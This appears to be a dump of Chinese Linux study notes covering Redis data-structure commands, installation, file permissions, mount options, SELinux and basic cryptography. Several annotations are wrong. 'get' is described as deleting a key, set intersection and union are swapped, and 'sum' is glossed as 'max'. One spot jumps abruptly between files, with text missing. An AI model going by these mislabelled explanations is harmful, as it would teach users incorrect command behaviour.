27 | **13、数字加指定大小:** `incrby num 5`
28 |
29 | **14、数字减指定大小:** `decrby num 5`
30 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/4linklian-biao-jie-gou.md:
--------------------------------------------------------------------------------
1 | ### Link链表结构
2 |
3 | **1、从左边插入一个值:** `lpush character a`
4 |
5 | **2、从右边插入一个值:** `rpush character b`
6 |
7 | **3、查看链表第一个值:** `lrange character 0 0`
8 |
9 | **4、查看链表最后一个值:** `lrange character -1 -1`
10 |
11 | **5、查看链表所有值:** `lrange character 0 -1`
12 |
13 | **6、查看链表制定位置:** `lrange character 1 3 #查看 2-4 的值`
14 |
15 | **7、去除一个值,并删除:**
16 |
17 | lpop character #从头取值,并从链表删除
18 | rpop character #从尾取值,并从链表删除
19 |
20 | **8、删除一个值:**
21 |
22 | lrem answer 1 b #从头开始从answer 这个链表中删除一个 值为b的KEY
23 | lrem anser -2 a #从尾部开始删除2个a ,值为正数代表从头开始删,值为负数代表从尾开始删
24 |
25 | **9、剪切:**
26 |
27 | ltrim character 2 5 #从第3个值截取到第6个值
28 | ltrim character 1 -2 #从第2个值开始截取到倒数第2个
29 |
30 | **10、查看指定下标的值:** `lindex character 0`
31 |
32 | **11、查看链表长度**: `llen character`
33 |
34 | **12、插入值:**
35 |
36 | linsert num before 3 2 #在num这个链表中 第一个值为3前面插入一个2
37 | linsert num after 9 10 #在 9 后面插入一个10
38 | linsert num after 1000 1001 #在1000 后面插入一个1001 如果1000 不存在插入失败
39 |
40 | **13、前出,后入:** `rpoplpush task job #将链表task中的第一个元素取出,插入到job`
41 |
42 | **14、等待取值:** `brpop job 20 #从 job里面取值,等待20秒。如果为0,则一直等待`
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/5set-ji-he-jie-gou.md:
--------------------------------------------------------------------------------
1 | ### set集合结构
2 |
3 | 特点:无序性、唯一性、确定性
4 |
5 | **1、给一个集合增加元素**
6 |
7 |
8 | sadd gender male female
9 | sadd gender yao yao 返回 只添加了一个(唯一性)
10 |
11 | **2、查看集合内容** `smembers gender 返回不是按照你添加的顺序(无序性)`
12 |
13 | **3、删除一个元素** `srem gender yao 返回值为你删除的数据的个数`
14 |
15 | **4、随机弹出一个元素并删除** `spop gender (场景可以用来抽签)`
16 |
17 | **5、随机弹出一个元素不删除** `srandmember gender `
18 |
19 | **6、判断集合里是否有这个元素** `sismember gender a 返回1存在0不存在`
20 |
21 | **7、返回集合总共有多少个元素** `scard gender`
22 |
23 | **8、移动一个集合里的元素到另一个集合**
24 |
25 | sadd upper A B C
26 | sadd lower a b c
27 | smove upper lower A 将 upper 里的A 移动到lower
28 |
29 | **9、求两个集合之间的并集**
30 |
31 | sadd lisi a b c d
32 | sadd wang a c d e f
33 | sadd poly a c d g
34 | sinter lisi wang poly 求3个学生有哪些相同的课程
35 |
36 | **10、查看并集** `sunion lisi wang poly 求3个学生一共有多少门课`
37 |
38 | **11、求差集 ** `sdiff lisi wang 李四的课程那些王五没有`
39 |
40 | **12、将他们的并集存放在一个新的集合里** `sinterstore result lisi wang poly`
41 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/6order-setyou-xu-ji-he.md:
--------------------------------------------------------------------------------
1 | ### order set有序集
2 |
3 | **1、添加一个有序集合** `zadd class 12 lily 13 lucy 18 lilei 6 poly`
4 |
5 | **2、按区间查询** `zrange class 0 3 查第一个到第四个`
6 |
7 | **3、按score的值查询** `zrangebyscore class 13 18 查看编号13到18`
8 |
9 | **4、limit offset 查询**
10 |
11 | 查看出编号1到20 跳过第一个 取2个值 zrangebyscore class 1 20 limit 1 2
12 |
13 | **5、查询出值并且查询出编号** `zrange class 1 3 withscores`
14 |
15 | **6、查看所有元素** `zrange class 0 -1 `
16 |
17 | **7、查询一个元素的排名 ** `zrank class poly 默认按从小到大排列 `
18 |
19 | **8、查询一个元素的排名用从大到小 ** `zrevrank class poly `
20 |
21 | **9、按照编号删除元素** `zremrangebyscore class 10 15`
22 |
23 | **10、按照排名来删除** `zremrangebyrank class 0 1`
24 |
25 | **11、按照值来删除** `zrem class lucy`
26 |
27 | **12、返回元素个数** `zcard class`
28 |
29 | **13、返回某个范围有多少人** `zcount class 25 30`
30 |
31 | **14、统计两个集合的集合**
32 |
33 | zadd lisi 3 cat 5 dog 6 horse
34 | zadd wang 2 cat 6 dog 8 horse 1 dankey
35 | zintersotre resulte 2 lisi wang 默认求和
36 | zrange resulte 0 -1
37 | zinterstore resulte 2 lisi wang aggregate min 求最小
38 | zinterstore resulte 2 lisi wang aggregate max 求最大
39 | zinterstore resulte 2 lisi wang aggregate sum 求最大
40 | zinterstore resulte 2 lisi wang weights 2 1 aggregate max 权重求最大
41 |
42 | **15、统计两个集合的交集** `zunionstore 同上`
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/73001-ha-xi-jie-gou.md:
--------------------------------------------------------------------------------
1 | ### hash结构
2 |
3 | **1、添加一个hash结构数据**
4 |
5 | hset user1 name lisi
6 | hset user1 age 28
7 | hset user1 height 175
8 |
9 | **2、查看hash所有数据** `hgetall user1`
10 |
11 | **3、一次添加一个hash 结构多个域与值** `hmset user2 name wang age 10 height 100`
12 |
13 | **4、查看单个域和值 ** `hget user1 name`
14 |
15 | **5、查看多个域和值** `hget user1 name age`
16 |
17 | **6、删除单个域和值 ** `hdel user1 name `
18 |
19 | **7、查看hash有几个域** `hlen user1 `
20 |
21 | **8、查看hash是否有某个域** `hexists user1 name`
22 |
23 | **9、域的值自增长** `hincrby user1 age 1 #user1 的年龄增长1`
24 |
25 | **10、域的值浮点型自增长** `hincrbyfloat user1 age 0.5 #user1 增长0.5`
26 |
27 | **11、返回所有域 ** `hkeys user2`
28 |
29 | **12、返回所有值** `hvals user2`
30 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/8redisshi-wu-ji-suo-ying-yong.md:
--------------------------------------------------------------------------------
1 | ### redis事务及锁应用
2 |
3 | **1、redis 支持简单的事务(不支持回滚**)
4 |
5 | **2、redis 与 MySQL对比:**
6 |
7 | MySQL redis
8 | 开启 start transaction mutil
9 | 语句 普通sql 普通命令
10 | 失败 Rollback回滚 Discard 取消
11 | 成功 Commit exec
12 |
13 | 注:rollback 域 discard 的区别
14 | 如果已经成功执行了2条语句,第3条语句出错
15 | rollback后,前2条的语句影响消失
16 | Discard 只是本次事务,前2条语句造成的影响仍然在
17 |
18 | 在mutil后面的语句中,语句出错可能有2种情况
19 | 1、语句就有问题:这种,Exec时报错,所有语句得不到执行
20 | 2、语句本身没错,但适用对象有问题,比如zadd 操作link对象
21 | exec之后,会执行正确的语句,并跳过不适当的语句
22 |
23 | set wang 200
24 | set zhao 700
25 | multi
26 | decrby zhao 100
27 | incrby wang 100
28 | exec
29 | 抢票{
30 | set wang 300
31 | set lisi 300
32 | set ticket 1
33 | wang:
34 | watch ticket #watch 可以监听多个key当其中一个key有变化,就会取消事务 取消 unwatch
35 | multi
36 | decr ticket
37 | decrby wang 100
38 | exec
39 | lisi:在王之前把票买走了。
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/9redispin-dao-fa-bu-yu-xiao-xi-ding-yue.md:
--------------------------------------------------------------------------------
1 | ### redis频道发布与消息订阅
2 |
3 | 发布一个频道:publish news 'today is sunshine'
4 |
5 | 订阅消息: subscribe news
6 |
7 | 模糊订阅消息: psubscribe new*
8 |
9 | 适合群聊在线聊天室,一个消息推送,都能收到消息
10 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/an-zhuang.md:
--------------------------------------------------------------------------------
1 | ### 安装
2 |
3 | **1、下载软件包**
4 |
5 | wget http://download.redis.io/releases/redis-3.0.5.tar.gz -P /usr/local/src
6 | **2、下载tcl支持**
7 |
8 | yum -y install tcl tcl-devel
9 | **3、解压编译**
10 |
11 | cd /usr/local/src && tar xf redis-3.0.5.tar.gz && cd redis-3.0.5 && make && make
12 | PREFIX=/usr/local/redis install
13 | **4、拷贝conf 文件**
14 |
15 | cp /usr/local/src/redis-3.0.5/redis.conf /usr/local/redis
16 | **5、启动服务**
17 | - **前端启动:**
18 |
19 | /usr/local/redis/bin/redis-server /usr/local/redis/redis.conf
20 | - **后端启动:**
21 |
22 | sed -i 's/^daemonize no/daemonize yes/g' /usr/local/redis/redis.conf
23 | /usr/local/redis/bin/redis-server /usr/local/redis/redis.conf
24 |
25 | **6、测试服务**
26 |
27 | /usr/local/redis/bin/redis-cli
28 | set site www.longge.com #添加一个KEY
29 | get site #删除一个KEY
30 |
31 | **7、添加环境变量**
32 |
33 | vim /etc/profile.d/redis.sh
34 | export REDIS_HOME=/usr/local/redis
35 | export PATH=$REDIS_HOME/bin:$PATH
36 |
37 | # cat > /etc/profile.d/redis.sh <> ~/.rvmrc
12 |
13 | #安装ruby
14 | rvm install ruby 2.4.1
15 |
16 | #替换gem源
17 | gem sources --remove https://rubygems.org/
18 | gem sources -a http://mirrors.aliyun.com/rubygems/
19 |
20 | #安装redis-dump
21 | gem install redis-dump -V
22 |
23 | **2、使用**
24 |
25 | #备份
26 | redis-dump -u 192.168.11.12:6379 >backup.json
27 |
28 | #恢复
29 | 111 100 100
23 | - umask 取反后的2进制和默认权限做与运算
24 |
25 |
26 | 111 100 100 umask
27 | 110 110 110 默认权限
28 | -----------
29 | 110 100 100
30 | rw- r-- r--
31 |
32 | - 得到最终的权限 644
33 |
34 |
35 | ###3、SUID SGID Sticky
36 |
37 | **可执行文件(SUID SGID):**
38 |
39 | 执行可执行文件的时候,不以执行者的身份去运行,而是以文件所属人(组)的身份去执行
40 | **目录 (SGID Sticky):**
41 |
42 | SGID:当一个A目录具有SGID的时候,在这个目录下新建的文件文件夹默认所属组会是A目录的所属组
43 | Sticky:当A目录具有Sticky位的时候,在A目录下的文件只有文件的所属人才能够删除文件,其他人哪怕对A目录有写的权限也不能删。
44 |
45 |
46 |
47 |
48 | ###4、ext3文件系统属性
49 |
50 | chattr lsattr
51 | a 设定此属性的档案只可以以附加模式 (append mode) 开启。
52 | i 设定此属性的档案不可以被任何使用者 (包括超级使用者 root) 改变内容、删除、改变名称。
53 |
54 |
55 | ###5、文件系统的访问控制列表
56 |
57 | setfacl -m (--modify) u:user:permission file | directory
58 | setfacl -m (--modify) u:group:permission file | directory
59 | setfacl -m (--modify) d:u:user:permission directory
--------------------------------------------------------------------------------
/linuxgao-ji/er-3001-quan-xian-kong-zhi/mountquan-xian.md:
--------------------------------------------------------------------------------
1 | ###文件系统的挂载选项
2 |
3 | **1、rw ro**
4 |
5 |
6 | [root@node0 test]# mount -o remount,ro /test/
7 | [root@node0 test]# echo "abc" >> /test/file1
8 | bash: /test/file1: Read-only file system
9 |
10 |
11 | **2、exec noexec**
12 |
13 |
14 | [root@node0 ~]# mount /dev/hdb1 /test/
15 | [root@node0 ~]# echo "hello" > /test/file1
16 | [root@node0 ~]# cp /bin/cat /test/
17 | [root@node0 ~]# cd /test/
18 | [root@node0 test]# ./cat file1
19 | hello
20 | [root@node0 test]# mount -o remount,noexec /test/
21 | [root@node0 test]# ./cat file1
22 | bash: ./cat: Permission denied
23 |
24 |
25 | **3、suid nosuid**
26 |
27 |
28 | [root@node0 test]# mount /dev/hdb1 /test/
29 | [root@node0 test]# ls
30 | cat cdrom file1 lost+found
31 | [root@node0 test]# chmod 640 file1
32 | [root@node0 test]# ls -l file1
33 | -rw-r----- 1 root root 6 Mar 3 16:04 file1
34 | [root@node0 test]# chmod u+s cat
35 | [root@node0 test]# su - user1
36 | [user1@node0 ~]$ cd /test/
37 | [user1@node0 test]$ ./cat file1
38 | hello
39 | [root@node0 test]# mount -o remount,nosuid /test/
40 | [root@node0 test]# su - user1
41 | [user1@node0 ~]$ cd /test/
42 | [user1@node0 test]$ ./cat file1
43 | ./cat: file1: Permission denied
44 |
45 |
46 | **4、dev nodev**
47 |
48 |
49 | [root@node0 test]# ls -l /dev/cdrom
50 | lrwxrwxrwx 1 root root 3 Mar 3 14:47 /dev/cdrom -> hdd
51 | [root@node0 test]# ls -l /dev/hdd
52 | brw-rw---- 1 root disk 22, 64 Mar 3 14:47 /dev/hdd
53 | [root@node0 test]# mknod cdrom b 22 64
54 | [root@node0 test]# mount cdrom /mnt/
55 | mount: block device cdrom is write-protected, mounting read-only
56 | [root@node0 test]# umount /mnt/
57 | [root@node0 test]# mount -o remount,nodev /test/
58 | [root@node0 test]# ls -l cdrom
59 | brw-r--r-- 1 root root 22, 64 Mar 3 16:13 cdrom
60 | [root@node0 test]# mount cdrom /mnt/
61 | mount: block device cdrom is write-protected, mounting read-only
62 | mount: cannot mount block device cdrom read-only
63 | [root@node0 test]# ls /mnt/
64 |
65 |
66 | **5、auto noauto**
67 |
68 |
69 | [root@node0 ~]# vim /etc/fstab
70 | /dev/hdb1 /test ext3 noauto 0 0
71 | [root@node0 ~]# mount -a
72 |
73 |
74 | **6、async sync**
75 |
76 |
77 | **7、atime noatime**
78 |
79 | Update inode access time for each access. This is the default.
80 |
81 | **8、noacl acl**
82 |
83 |
--------------------------------------------------------------------------------
/linuxgao-ji/er-3001-quan-xian-kong-zhi/selinux.md:
--------------------------------------------------------------------------------
1 | **1、简介**
2 |
3 | SELinux是「Security-Enhanced Linux」的简称,是美国国家安全局「NSA=The National Security Agency」 和SCC(Secure Computing Corporation)开发的 Linux的一个扩张强制访问控制安全模块。
4 |
5 | 因为企业的业务平台的服务器上存储着大量的商务机密,个人资料,个人资料它直接关系到个人的隐私问题。特别是政府的网站,作为信息公开的平台,它的安全就更显得重要了。这些连到互联网的服务器,不可避免的要受到来自世界各地的各种威胁。最坏的时候我们的服务器被入侵,主页文件被替换,机密文件被盗走。除了来自外部的威胁外,内部人员的不法访问,攻击也是不可忽视的。对于这些攻击或者说是威胁,当然有很多的办法,有防火墙,入侵检测系统,打补丁等等。因为Linux也和其他的商用UNIX一样,不断有各类的安全漏洞被发现。
6 |
7 | 传统的Linux OS的不足之处
8 | 虽然Linux 比起 Windows 来说,它的可靠性,稳定定要好得多,但是他也是和其他的UNIX 一样,有以下这些不足之处。
9 |
10 |
11 | 1、存在特权用户root
12 | 任何人只要得到root的权限,对于整个系统都可以为所欲为。这一点Windows也一样。
13 | 2、对于文件的访问权的划分不够细
14 | 在linux系统里,对于文件的操作,只有「所有者」,「所有组」,「其他」这3类的划分。对于「其他」这一类里的用户再细细的划分的话就没有办法了。
15 | 3、SUID程序的权限升级
16 | 如果设置了SUID权限的程序有了漏洞的话,很容易被攻击者所利用。
17 | 4、DAC (Discretionary Access Control)问题
18 | 文件目录的所有者可以对文件进行所有的操作,这给系统整体的管理带来不便。对于以上这些的不足,防火墙,入侵检测系统都是无能为力的。
19 |
20 |
21 |
22 | DAC(Discretionary access control,自主访问控制):
23 |
24 | DAC机制就是指对象(比如程序、文件或进程等)的的拥有者可以任意的修改或授予此对象相应的权限。例如传统Linux,Windows等。
25 | MAC(Mandatory Access Control,强制访问控制):
26 |
27 | MAC机制是指系统不再允许对象(比如程序、文件或文件夹等)的拥有者随意修改或授予此对象相应的权限,而是透过强制的方式为每个对象统一授予权限,例如SELinux。
28 |
29 |
30 |
31 | SELinux的优点
32 |
33 | SELinux系统比起通常的Linux系统来,安全性能要高的多,它通过对于用户,进程权限的最小化,即使受到攻击,进程或者用户权限被夺去,也不会对整个系统造成重大影响。在标准Linux中,主体的访问控制属性是与进程通过在内核中的进程结构关联的真实有效的用户和组ID,这些属性通过内核利用大量工具进行保护,包括登陆进程和setuid程序,对于文件,文件的inode包括一套访问模式位、文件用户和组ID。以前的访问控制基于读/写/执行这三个控制位,文件所有者、文件所有者所属组、其他人各一套。在SELinux中,访问控制属性总是安全上下文三人组形式,所有文件和主体都有一个关联的安全上下文,标准Linux使用进程用户/组ID,文件的访问模式,文件用户/组ID要么可以访问要么被拒绝,SELinux使用进程和客体的安全上下文,需要特别指出的是,因为SELinux的主要访问控制特性是类型强制,安全上下文中的类型标识符决定了访问权。若要访问文件,必须同时具有普通访问权限和SELinux访问权限。因此即使以超级用户身份root运行进程,根据进程以及文件或资源的SELinux安全性上下文可能拒绝访问文件或资源。
34 |
35 | 例如:
36 | 在Linux中,passwd程序是可信任的,修改存储经过加密的密码的影子密码文件(/etc/shadow),passwd程序执行它自己内部的安全策略,允许普通用户修改属于他们自己的密码,同时允许root修改所有密码。为了执行这个受信任的作业,passwd程序需要有移动和重新创建shadow文件的能力,在标准Linux中,它有这个特权,因为passwd程序可执行文件在执行时被加上了setuid位,它作为root用户(它能访问所有文件)允许,然而,许多程序都可以作为root允许(实际上,所有程序都有可能作为root允许)。这就意味着任何程序(当以root身份运行时)都有可能能够修改shadow文件。类型强制使我们能做的事情是确保只有passwd程序(或类似的受信任的程序)可以访问shadow文件,不管运行程序的用户是谁。
37 |
38 |
39 |
40 |
41 | 设置开机启动时,SELinux的运行模式
42 |
43 | [root@localhost ~]# cat /etc/sysconfig/selinux
44 | # This file controls the state of SELinux on the system.
45 | # SELINUX= can take one of these three values:
46 | # enforcing - SELinux security policy is enforced.
47 | # permissive - SELinux prints warnings instead of enforcing.
48 | # disabled - No SELinux policy is loaded.
49 | SELINUX=enforcing
50 | # SELINUXTYPE= type of policy in use. Possible values are:
51 | # targeted - Only targeted network daemons are protected.
52 | # strict - Full SELinux protection.
53 | SELINUXTYPE=targeted
54 |
55 | SELINUX 参数值:
56 | enforcing 强行(报警并限制)
57 | permissive 许可(报警不限制)
58 | disabled 禁用
59 |
60 | SELINUXTYPE 参数值:
61 | targeted 保护网络相关服务
62 | strict 完整的保护功能,包含网络服务、一般指令及应用程序
63 | mls 多级别模块化
64 |
65 |
66 | 查看SELinux的当前状态,并对当前状态做调整
67 |
68 | [root@node1 ~]# sestatus
69 | SELinux status: enabled
70 | SELinuxfs mount: /selinux
71 | Current mode: enforcing
72 | Mode from config file: enforcing
73 | Policy version: 21
74 | Policy from config file: targeted
75 | [root@node1 ~]# getenforce
76 | Enforcing
77 | [root@node1 ~]# setenforce 0
78 | Permissive
79 | [root@node1 ~]# setenforce 1
80 | [root@node1 ~]# getenforce
81 | Enforcing
82 |
83 |
84 |
85 | 查看安全上下文 ls –Z (查看文件的);ps –Z (查看进程的)
86 |
87 | [root@node1 ~]# ls -Z /etc/passwd
88 | -rw-r--r-- root root system_u:object_r:etc_t /etc/passwd
89 | [root@node1 ~]# ls -Zld /mnt/
90 | drwxr-xr-x 2 system_u:object_r:mnt_t root root 4096 Oct 1 2009 /mnt/
91 |
92 | 查看系统默认安全上下文
93 |
94 | [root@node1 ~]# semanage fcontext -l
95 |
--------------------------------------------------------------------------------
/linuxgao-ji/er-3001-quan-xian-kong-zhi/sudoquan-xian.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/linuxgao-ji/er-3001-quan-xian-kong-zhi/sudoquan-xian.md
--------------------------------------------------------------------------------
/linuxgao-ji/shu-ju-an-quan.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/linuxgao-ji/shu-ju-an-quan.md
--------------------------------------------------------------------------------
/linuxgao-ji/shu-ju-an-quan/cuan-gai.md:
--------------------------------------------------------------------------------
1 | A<--------------->C<------------>B
2 |
3 | C篡改A给B的信息 ( HASH,数据的完整性 )
4 |
5 |
6 | hash 哈希 单向散列算法,生成hash值校验文件完整性
7 |
8 | - 原信息不改相同的hash算法得到的值固定不变
9 | - 不管原始信息多长多短hash值的长度是固定不变
10 | - hash算法是无穷集合和有穷集合的映射(不可逆)
11 |
12 | md5 Message-Digest Algorithm 5(信息-摘要算法)
13 |
14 | [root@localhost ~]# md5sum /etc/passwd
15 | bffc5857b2cf07ed48dd2a7535f11a31 /etc/passwd
16 |
17 | sha1 Secure Hash Algorithm(安全哈希算法)
18 |
19 | [root@localhost ~]# sha1sum /etc/passwd
20 | fb3145817b02071c0ec19e2380385f1e47f1a92f /etc/passwd
21 |
--------------------------------------------------------------------------------
/linuxgao-ji/shu-ju-an-quan/qie-ting.md:
--------------------------------------------------------------------------------
1 | A<-------------------------------->B
2 | |
3 | C
4 | 窃听 ( 加密,数据机密性)
5 |
6 |
7 |
8 | **1、加密(解决数据机密性**)
9 |
10 | 加密由2部分组成:算法&密钥 (算法要够复杂,密钥要够安全)
11 |
12 |
13 | **对称加密:(Symmetric encryption)**
14 |
15 | 采用单钥密码系统的加密方法,同一个密钥可以同时用作信息的加密和解密,这种加密方法称为对称加密,也称为单密钥加密。
16 | 需要对加密和解密使用相同密钥的加密算法。由于其速度,对称性加密通常在消息发送方需要加密大量数据时使用。对称性加密也称为密钥加密。
17 |
18 | DES (Data Encryption Standard数据加密标准)
19 | 3DES (Triple DES 三重DES)
20 | AES (Advanced Encryption Standard 高级加密标准)
21 |
22 | **非对称加密:(Asymmetric encryption)**
23 |
24 | 与对称加密算法不同,非对称加密算法需要两个密钥:公开密钥(publickey)和私有密钥(privatekey)。
25 | 公开密钥与私有密钥是一对,如果用公开密钥对数据进行加密,只有用对应的私有密钥才能解密;如果用私有密钥对数据进行加密,那么只有用对应的公开密钥才能解密。因为加密和解密使用的是两个不同的密钥,所以这种算法叫作非对称加密算法。
26 |
27 | RSA
28 | DSA
29 |
30 |
31 |
32 | **2、openssl 对称加密**
33 |
34 | _加密,使用des算法,密钥123_
35 |
36 | [root@node1 tmp]# openssl enc -e -des -in /etc/passwd -out /tmp/passwd.des
37 | enter des-cbc encryption password:123
38 | Verifying - enter des-cbc encryption password:123
39 |
40 | _解密_
41 |
42 | [root@node1 tmp]# openssl enc -d -des -in file1
43 |
--------------------------------------------------------------------------------
/linuxgao-ji/shu-ju-an-quan/wei-zhuang.md:
--------------------------------------------------------------------------------
1 | A<---------------------------->C (B)
2 |
3 | C伪装B (CA,验证中心)
4 |
5 |
6 |
7 |
8 | SSL/TLS SSL(Secure Sockets Layer 安全套接层),及其继任者传输层安全(Transport Layer Security,TLS)是为网络通信提供安全及数据完整性的一种安全协议。
9 | TLS与SSL在传输层为数据通讯进行加密提供安全支持。
10 | SSL 为Netscape所研发,用以保障在Internet上数据传输之安全,利用数据加密(Encryption)技术,可确保数据在网络上之传输过程中不会被截取及窃听。
11 | 它已被广泛地用于Web浏览器与服务器之间的身份认证和加密数据传输。
12 |
13 | SSL协议可分为两层:
14 |
15 | SSL握手协议(SSL Handshake Protocol):`它建立在SSL记录协议之上,用于在实际的数据传输开始前,通讯双方进行身份认证、协商加密算法、交换加密密钥等。 `
16 | SSL记录协议(SSL Record Protocol):`它建立在可靠的传输协议(如TCP)之上,为高层协议提供数据封装、压缩、加密等基本功能的支持。`
17 |
18 | SSL协议提供的服务主要有:
19 |
20 | - 认证用户和服务器,确保数据发送到正确的客户机和服务器
21 | - 加密数据以防止数据中途被窃取
22 | - 维护数据的完整性,确保数据在传输过程中不被改变
--------------------------------------------------------------------------------
/linuxgao-ji/shu-ju-an-quan/wu-li-zhong-duan.md:
--------------------------------------------------------------------------------
1 | A<-----------XXX C XXX----------->B
2 | A与B之间通信被C物理中断
3 |
--------------------------------------------------------------------------------
/linuxji-chu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/linuxji-chu.md
--------------------------------------------------------------------------------
/linuxji-chu/er-3001-wen-jian-lei-xing-he-wen-jian-kuo-zhan-ming.md:
--------------------------------------------------------------------------------
1 | ###一、Linux中文件类型
2 | 在Linux系统中,可以说一切设备(包括目录,普通文件)皆为文件。文件类型包含有普通文件,目录,字符设备文件,块设备文件,符号链接文件等等
3 | 查看 ls -al
4 |
5 | 2-10字符描述 ugo权限
6 | 第一个字符表示文件属性:
7 | d:表示目录
8 | -:表示普通文件
9 | l:表示是一个符号链接文件
10 | b,c:分别表示区块设备和其他的外围设备。
11 | s,p:这些文件关系到系统的数据结构和管道,通常很少见
12 |
13 | ###二、文件类型分别介绍:
14 | **1、普通文件(regular file) :** 一般是相关的应用程序或系统命令创建,比如:touch cp tar 等工具
15 |
16 | 删除方式: rm
17 |
18 | **2、目录(directory):** 带d 开头的文件表示目录。目录在Linux中是一个比较特殊的文件
19 |
20 | 查看 ls -ld
21 | 删除方式: rm rmdir(删除空目录)
22 | 查看: ls -F 目录后面会多一个斜线
23 | ls -F /etc/ | grep '/'
24 | ls -l /etc/ | grep '^d'
25 | **3、字符设备或块设备:** 带b或c开头的 c 表示字符设备 b表示块设备
26 |
27 | mknod 创建
28 | rm 删除
29 |
30 | **4、套接口文件:**当我们启动mysql服务时,会产生一个mysql.sock文件。这个文件的属性的第一个字符是s,这类文件通常用在网络之间进行数据连接。
31 |
32 | 例如:
33 | mysql -uroot -ppass -S /data/3306/mysql.sock 这就是一个MySQL客户端程序连接服务器的命令
34 |
35 | **5、符号链接文件:** l开头。l表示链接文件(和windows下的快捷方式相似)
36 |
37 | ln -s 源文件名 新文件名
38 |
39 |
40 |
41 | ###三、Linux中的文件扩展名
42 | 一般来说,Linux下文件是不许要扩展名。
43 | Linux下扩展名的作用:为了兼容windows,同时,便于我们大多数习惯了windows用户区分文件的不同。我们还习惯通过扩展名来表示不同文件的类型。
44 |
45 | 1)tar,tar.gz ,tgz,zip,tar.bz 表示压缩文件,此类文件创建命令一般为 tar gzip unzip 等
46 | 2)sh 表示shell脚本文件,通过shell语言开发的程序
47 | 3)pl perl语言文件
48 | 4) py Python语言文件
49 | 5) html htm php jsp do 表示网页语言的文件
50 | 6)conf 表示系统配置文件
51 | 7) rpm 表示rpm安装包
52 |
53 |
54 |
55 |
56 | find -type 文件类型 <查找>
57 |
--------------------------------------------------------------------------------
/linuxji-chu/proc.md:
--------------------------------------------------------------------------------
1 | ## /proc 目录下文件详解 ##
2 |
3 | ### 一、xxx
4 |
5 | **1、内存**
6 |
7 | /proc/buddyinfo 伙伴系统的信息
8 | /proc/pagetypeinfo 伙伴系统进一步细分信息
9 | /proc/zoneinfo 内存区域使用情况
10 | /proc/slabinfo
11 |
12 | /proc/meminfo 当前内存信息
13 | /proc/vmstat 虚拟内存统计信息
14 | /proc/vmallocinfo 虚拟内存分配信息
15 | /proc/swaps swap分区使用情况
16 | /proc/mtd 内存设备分区表信息
17 | /proc/dma DMA(直接内存访问)通道的列表
18 |
19 | /proc/mtrr 系统使用的Memory Type Range Registers (MTRRs)
20 |
21 | /proc/kpagecount
22 | /proc/kpageflags
23 |
24 |
25 | **2、IO**
26 |
27 | /proc/filesystems 目前系统支持的文件系统
28 | /proc/diskstats 磁盘设备的统计信息
29 | /proc/ioports 当前系统硬件设备使用的IO端口列表
30 | /proc/iomem I/O 内存映射
31 | /proc/locks 当前被内核锁定的文件
32 | /proc/mounts 当前挂载信息
33 |
34 |
35 | **3、cpu**
36 |
37 | /proc/cpuinfo cpu相关信息
38 | /proc/loadavg 当前系统负载
39 | /proc/softirqs 系统软中断信息
40 | /proc/schedstat 调度器信息
41 | /proc/sched_debug 调度器debug信息
42 |
43 |
44 | **4、网卡**
45 |
46 |
47 | **5、网络**
48 |
49 |
50 | **6、kernel**
51 |
52 | /proc/cmdline 在引导启动时传递给Linux内核的参数
53 | /proc/crypto 内核支持的加密方式
54 | /proc/modules 当前系统已经加载的模块(lsmod)
55 | /proc/version 内核版本信息
56 | /proc/stat 系统和内核的统计信息
57 | /proc/fb 内核编译期间帧缓冲信息
58 | /proc/kmsg 内核日志信息
59 | /proc/kcore 表示系统物理内存,可以用gdb检查内核数据结构的当前状态
60 | /proc/kallsyms 内核符号信息,主要用于调试
61 | /proc/timer_list 内核各种计时器信息
62 | /proc/timer_stats
63 |
64 | /proc/sysrq-trigger 内核触发器(危险!!!)
65 | /proc/execdomains Linux内核当前支持的execution domains
66 |
67 |
68 | **7、other**
69 |
70 | /proc/interrupts 中断表
71 | /proc/uptime 系统运行时间
72 |
73 | /proc/devices 设备信息(主设备号等)
74 | /proc/mdstat 虚拟设备信息(软raid等)
75 | /proc/misc 其他的主要设备(设备号为10)上注册的驱动
76 | /proc/cgroup cgroup相关信息
77 | /proc/consoles
78 |
79 | /proc/keys 证书相关
80 | /proc/key-users
81 |
82 |
83 | 二、目录
84 |
85 | acpi
86 | bus
87 | driver
88 | fs
89 | ipmi
90 | irq
91 | scsi
92 | sys
93 | sysvipc
94 | tty
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
--------------------------------------------------------------------------------
/linuxji-chu/si-3001-ruan-lian-jie-he-ying-lian-jie.md:
--------------------------------------------------------------------------------
1 | ###一、链接的概念:
2 |
3 | 在Linux系统中,链接分为两种:一种被称为硬链接(Hard Link),另一种被称为软链接或符号链接(Symbolic Link)。在默认不带参数的情况下,执行ln命令创建的是硬链接
4 |
5 |
6 | ###二、硬链接:
7 |
8 | 是指通过索引节点来进行链接。在linux的文件系统中,保存在磁盘分区中的文件不管是什么类型都会给他分配一个编号,这个编号被称为索引节点号(Inode Index)
9 | 在Linux系统中,多个文件名指向同一个索引节点是正常且允许的。一般这种链接就称为硬链接。硬链接的作用之一是允许一个文件拥有多个有效路径名,这样用户就可以建立硬链接到重要的文件,以防止“误删”源数据(很多硬件,如netapp存储中的快照功能就应用了这个原理,增加一个快照就多了一个硬链接)。为什么为文件创建了一个硬链接就会防止数据误删呢?
10 | 因为文件系统的原理是,只要文件的索引节点还有一个以上的链接(仅仅删除了该文件指向)。只删除其中一个链接并不影响索引节点本身和其他的链接(既数据文件实体并未被删除),只有当最后一个链接呗删除的后,此时如果有新的数据存储到硬盘时。被删除文件的数据块及目录的链接才会被释放,空间被新数据占用覆盖。此时,数据就再也无法找回了。也就是说,在Linux系统中,删除文件(其实目录也是文件)的条件是与之相关的所有硬链接文件均被删除。
11 |
12 | ###三、软链接:
13 |
